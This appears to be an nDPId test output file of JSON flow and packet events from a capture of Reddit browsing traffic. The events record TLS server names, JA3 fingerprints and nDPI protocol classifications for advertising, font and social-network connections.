-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"thread_ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="} 
-00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 